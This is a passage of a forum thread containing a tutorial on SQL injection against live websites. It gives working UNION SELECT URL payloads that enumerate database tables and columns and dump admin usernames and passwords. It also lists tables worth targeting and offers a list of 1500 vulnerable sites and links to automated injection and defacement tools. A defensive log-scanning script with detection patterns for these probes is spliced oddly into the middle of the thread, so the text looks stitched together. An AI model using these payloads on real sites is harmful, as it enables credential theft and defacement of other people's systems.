    Now there you should see the database version at the screen. It will either be something like 4.xxx and 5.xxx.

    So now since there are different methods for the databases I will split now the tutorial.


    ▂ ▃ ▄ ▅ ▆ ▇ SQL Injection - The Tutorial - Database 5 and above █ ▇ ▆ ▅ ▄ ▃ ▂


    So now we know that the database is version 5 and above. Now we need to find the tables.

    We need to replace the vulnerable column with table_name and add information_tables at the end of the url.
    To get the tables add the following at the end of the url: union all select 1,table_name,3 from information_schema.tables/*
    So it should look like:

    Code:
    www.sqlitestsite.com/index.php/id=234  union all select 1,table_name,3 from information_schema.tables/*
    Now you will see a few tables on the screen, but those are not all of them. To find all tables we need to limit the end of the query. We will do that by adding 0,1.. and so on at the end of the url.

    Just add the following at the end of the url: union all select 1,table_name,3 from information_schema.tables limit 0,1/*

    Now we know table one, but that's not enough, we need to get the right table to find out all the user information and also admin login.

    Now to get the 2nd table, we need to replace 0,1, with 1,1 so it should look like: union all select 1,table_name,3 from information_schema.tables limit 1,1/*

    To get the 3rd table we need to replace 1,1 with 2,1, so now you will just have to keep going until you find a useful table that can get us the information

    In order good tables are:
    Code:
    tbl_user, tbl_admin, tbl_access, user, users, member, members, admin, admins, customer, customers, orders, phpbb_users, phpbb_admins,
    Now we know the tables, now we need to find out the columns.

    To find out the columns we will replace the vulnerable columns with: column_name so just add the following at the end of the url: union all select 1,column_name,3 from information_schema.columns limit 0,1/*

    Code:
    www.sqlitestsite.com/index.php/id=234 union all select 1,column_name,3 from information_schema.columns limit 0,1/*
    So now just replace 0,1 with 1,1, then with 2,1 and so on until you find a useful column as the following:
    Code:
    first_name, last_name, email, username, password, pass, user_id, user_pass
    So now we found a good table, lets say we found table admin. To get more info of that table add the following at the end of the url: union all select 1,column_name,3 from information_schema.columns where table_name='admin'/*

    Code:
    www.sqlitestsite.com/index.php/id=234 union all select 1,column_name,3 from information_schema.columns where table_name='admin'/*
    So now we will get more information about the table "admin"

    So now we see all the columns in table admin. To get the info of the columns you will have to type in the following, let's say we got column id, password, username: union all select 1,concat(id,0x3a,password,0x3a,username) from users/*

    The 0x3a is the hex for a ;.

    Now we will get the information and we are finally done with hacking a database version 5
    [multipage=Conclusion and some Goodies ;D]


    ▂ ▃ ▄ ▅ ▆ ▇ SQL Injection - The Tutorial - Database 4 and above █ ▇ ▆ ▅ ▄ ▃ ▂

    As pointed out before, I will show you guys now how to get the database info if the version is 4 or below.

    adding soon, gotta do P90x now ;D
    ▂ ▃ ▄ ▅ ▆ ▇ SQL Injection - Conclusion + Goodies █ ▇ ▆ ▅ ▄ ▃ ▂

    So guys, this was my tutorial on how to SQL Inject websites. I hope you understood everything, but if not feel free to ask me via private message, post your question below or add me on msn: [Only registered and activated users can see links. ]

    Guys it took me 4 hours to make this fuking thread, so I would appreciate it if you say Thank you


    Now since I am a nice guy, I will provide you guys with some goodies

    List of over 1500 vulnerable sites (found by me):
    DOWNLOAD LINK: [Only registered and activated users can see links. ]


    Too lazy to do the manual SQL Injection? Here is a tutorial on how to SQLi with Havij and SQLi Helper v2.7 (Must be premium): http://www.nextgenupdate.com/forums/...injection.html


    Want to make a good defacement but you don't know html or php? Use this tool to do the work for you (Must be premium):
    http://www.nextgenupdate.com/forums/...e-creator.html
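
From the defender's side, the probing sequence walked through in the tutorial above (order by N, union all select, information_schema lookups, limit n,1 paging) leaves a recognizable trail in web access logs. The scanner below is an added example, not part of the original post; the log lines, IP addresses, request paths and all function names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample lines (combined log format, documentation-range IPs).
SAMPLE_LOG = """\
198.51.100.20 - - [22/Sep/2011:07:29:50 +0000] "GET /index.php?id=234 HTTP/1.1" 200 5120
203.0.113.7 - - [22/Sep/2011:07:30:01 +0000] "GET /index.php?id=234+order+by+1/* HTTP/1.1" 200 5120
203.0.113.7 - - [22/Sep/2011:07:30:04 +0000] "GET /index.php?id=234+order+by+4/* HTTP/1.1" 500 310
203.0.113.7 - - [22/Sep/2011:07:30:09 +0000] "GET /index.php?id=-234%20UNION%20ALL%20SELECT%201,2,3/* HTTP/1.1" 200 5133
203.0.113.7 - - [22/Sep/2011:07:30:15 +0000] "GET /index.php?id=234+union+all+select+1,table_name,3+from+information_schema.tables+limit+1,1/* HTTP/1.1" 200 5140
198.51.100.20 - - [22/Sep/2011:07:31:02 +0000] "GET /search.php?q=order+by+price HTTP/1.1" 200 2048
"""

LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) ')

# Stage name -> pattern, in the order the tutorial walks through the steps.
STAGES = [
    ("column_count", re.compile(r"\border\s+by\s+\d+")),
    ("union_probe", re.compile(r"\bunion\s+(?:all\s+)?select\b")),
    ("schema_enum", re.compile(r"\binformation_schema\s*\.\s*(?:tables|columns)\b")),
    ("row_paging", re.compile(r"\blimit\s+\d+\s*,\s*\d+")),
]

def normalize(target):
    """URL-decode, lowercase, turn closed SQL comments into spaces, collapse whitespace."""
    text = unquote_plus(target).lower()
    text = re.sub(r"/\*.*?\*/", " ", text)
    return re.sub(r"\s+", " ", text)

def classify(target):
    """Return the probe stages whose pattern appears in one request target."""
    text = normalize(target)
    return [name for name, pattern in STAGES if pattern.search(text)]

def scan(log_text, min_stages=2):
    """Map client IP -> stages seen, keeping clients that hit at least min_stages stages."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        match = LINE.match(line)
        if match:
            seen[match.group(1)].update(classify(match.group(2)))
    return {ip: [name for name, _ in STAGES if name in stages]
            for ip, stages in seen.items() if len(stages) >= min_stages}

if __name__ == "__main__":
    for ip, stages in scan(SAMPLE_LOG).items():
        print(ip, "->", ", ".join(stages))
```

These patterns are heuristics for triage and only see what reaches the access log (typically GET targets). The fix on the application side is to bind `id` as a typed parameter in a prepared statement so that none of these strings are ever parsed as SQL.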



    you're the man
    Quote Originally Posted by NeedaLifeSoon View Post
    To me it seems that another underlying problem is the feeling that ex staff is somehow way superior to other members.
    In the way they act and are treated by current staff.
    Very few retired because of fundamental issues on how the site was being run, but all act that way after.

  10. jackf094 Haxor!

    Join Date Oct 2010

    Posts 38

    Membership Standard

    Reputation: 10

    09-22-2011 07:35 AM #19

    I found an error on a site on line 231.

    Do I really need to put [Only registered and activated users can see links. ].... all the way up to 231?!

    There must be an easier way.

    Thanks

  11. Xtension Save Point

    Join Date Sep 2011

    Posts 7

    Membership Standard

    Reputation: 10

    09-29-2011 07:44 PM #20 Google Dorks

    I don't think it's good to begin crawling google dorks.
    Try learning something more complicated.

    To learn a good bit before you move to big time shit.
